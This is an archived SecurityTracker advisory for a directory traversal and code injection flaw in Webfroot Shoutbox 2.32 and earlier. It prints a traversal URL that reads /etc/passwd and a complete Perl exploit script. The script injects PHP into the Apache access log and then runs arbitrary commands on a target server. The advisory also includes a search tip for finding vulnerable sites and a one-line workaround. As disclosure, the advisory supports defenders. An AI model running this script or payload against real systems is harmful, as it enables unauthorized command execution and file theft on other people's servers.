Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Webfroot Shoutbox Input Validation Flaws Let Remote Users View Files and Execute Commands on the System
|
|
SecurityTracker Alert ID: 1006877
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 29 2003
|
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Advisory: SCAN Associates
|
Version(s): 2.32 and prior
|
Description: An input validation vulnerability was reported in Webfroot Shoutbox. A remote user can view files on the system. A remote user can execute arbitrary commands on the system.
Scan Associates reported that a remote user can read arbitrary files on the system with the privileges of the web server. A remote
user can set the 'conf' variable to the desired file name to view the file. A demonstration exploit URL is provided:
http://[target]/shoutbox.php?conf=../../../../../
../../etc/passwd
It is also reported that, in version 2.31 and prior versions, a remote user can specify a remote location for
the 'conf' variable to cause arbitrary PHP code, including operating system commands, at the remote location to be executed on the
target system. The code will run with the privileges of the target server's web daemon. A demonstration exploit script is provided
in the Source Message.
|
Impact: A remote user can view arbitrary files on the system with the privileges of the web daemon.
A remote user can execute arbitrary
PHP code, including operating system commands, on the target system with the privileges of the web daemon (applies to version 2.31
and prior).
|
Solution: No solution was available at the time of this entry.
The author of the report has provided the following workaround:
Append to line 48 of shoutbox.php:
$conf = str_replace('./', '', $conf); // to avoid directory traversal
|
Vendor URL: shoutbox.sourceforge.net/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: pokleyzz <pokleyzz@scan-associates.net>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 29 May 2003 11:52:54 +0800
From: pokleyzz <pokleyzz@scan-associates.net>
Subject: [VulnWatch] Webfroot Shoutbox 2.32 directory traversal and code injection.
|
--------------080107090307080103070204
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Products: Webfroot Shoutbox v 2.32 and below (http://shoutbox.sf.net)
Date: 09 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary: Webfroot Shoutbox 2.32 and below directory traversal and code injection.
Description
===========
Webfroot Shoutbox is PHP script released under the GPL. Also known as a tagboard
or a blabbox, shoutboxes allow visitors to your website to leave messages to
other visitors quickly and easily.
Details
=======
User can view any readable file on system where webfroot shoutbox is running using
$conf variable.
i) Shoutbox v2.32
shoutbox.php line 43
-------------------------------------------------------------------
if (!isset($conf)) {
$conf="shoutboxconf.php";
} else {
# michel v was there
$conf = str_replace(':', '', $conf); // hi cross-site scripting, bye cross-site scripting
$conf = str_replace('%3a', '', $conf); // hi cross-site scripting, bye cross-site scripting
require_once ($conf);
-------------------------------------------------------------------
ii) Shoutbox v2.31
shoutbox.php line 43
-------------------------------------------------------------------
if (!isset($conf)) {
$conf="shoutboxconf.php";
require_once ($conf);
--------------------------------------------------------------------
Proof of concept
================
a) View any readable file
http://blablabla.com/shoutbox.php?conf=../../../../../../../etc/passwd
b) Remote command execution
i) for version 2.31 user can remotely include file.
ii) version 2.32 user can use apache access_log to include php code
[see attachment]
Workaround
==========
Append to line 48 of shoutbox.php
$conf = str_replace('./', '', $conf); // to avoid directory traversal
Tips
====
Search for ":: Shoutbox" at www.google.com can easily identify vulnerable site (129,000 res
ult)
--------------080107090307080103070204
Content-Type: application/x-perl;
name="jeritan_batinku.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="jeritan_batinku.pl"
#!/usr/bin/perl
# Webfroot Shoutbox < 2.32 on apache exploit
# by pokleyzz of d'scan clanz
#
# Greet:
# tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, tenukboncit, kerengge_kurus ,
# s0cket370 , b0iler and d'scan clan.
# Shout to:
# #vuln , #mybsd , #mylinux
# Just for fun :). Weekend stuff ..
use IO::Socket;
my $host = "127.0.0.1";
my $port = 80;
my $shoutbox = "shoutbox.php?conf=";
my $shoutboxpath = "/shoutbox";
my $cmd = "ls -l";
my $conn;
my $type;
my @logs = (
"/etc/httpd/logs/acces_log",
"/etc/httpd/logs/acces.log",
"/var/www/logs/access_log",
"/var/www/logs/access.log",
"/usr/local/apache/logs/access_log",
"/usr/local/apache/logs/access.log",
"/var/log/apache/access_log",
"/var/log/apache/access.log",
"/var/log/httpd/access_log",
"/var/log/httpd/access.log",
#"D:/apps/Apache Group/Apache2/logs/access.log"
);
my $qinit = "GET /<?\$h=fopen('/tmp/.ex','w+');fwrite(\$h,'Result:<pre><?system(\$cm
d);?></pre>');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection:
Close\n\n";
my $conn;
if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){
$type = $ARGV[0];
else {
print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\tby pokleyzz of d' scan clan\n\n"
;
print "Usage: \n jeritan_batinku.pl (x|r) host [command] [path] [port]\n";
print "\ttype\tx = exploit | r = run command (after run with x option)\n";
print "\thost\thostname\n";
print "\tcommand\tcommand to execute on remote server\n";
print "\tpath\tpath to shoutbox installation ex: /shoutbox\n";
print "\tport\tport number\n";
exit;
if ($ARGV[1]){
$host = $ARGV[1];
if ($ARGV[2]){
$cmd = $ARGV[2];
if ($ARGV[3]){
$shoutboxpath = $ARGV[3];
if ($ARGV[4]){
$port = int($ARGV[4]);
$cmd =~ s/ /+/g;
sub connect_to {
#print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
sub connect_end {
#print "[x] Close connection\n";
close($conn);
sub exploit {
my $access_log = $_[0];
my $result = "";
$access_log =~ s/ /+/g;
my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\nHost: $host\nConnection: Cl
ose\n\n";
print "$query";
print "[x] Access log : ", $access_log ,"\n";
&connect_to;
print $conn $query;
while ($line = <$conn>) {
$result = $line;
#print $result;
};
&connect_end;
sub run_cmd {
my $conf="/tmp/.ex";
#my $conf="d:/tmp/.ex";
my $result = "";
my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\nHost: $host\nConnect
ion: Close\n\n";
print "[x] Run command ...\n";
&connect_to;
print $conn $query;
while ($line = <$conn>) {
$result .= $line;
};
&connect_end;
if ($result =~ /Result:/){
print $result;
} else {
print $result;
print "[*] Failed ...";
}
sub insert_code {
my $result = "";
print "[x] Access log : ", $access_log ,"\n";
print "[x] Insert php code into apache access log ...\n";
&connect_to;
print $conn "$qinit";
while ($line = <$conn>) {
$result .= $line;
};
&connect_end;
print $result;
if ($type eq "x"){
&insert_code;
print "[x] Trying to exploit ...\n";
for ($i = 0;$i <= $#logs; $i++){
&exploit($logs[$i]);
}
&run_cmd;
} else {
&run_cmd;
--------------080107090307080103070204--
|
|
Go to the Top of This SecurityTracker Archive Page
|
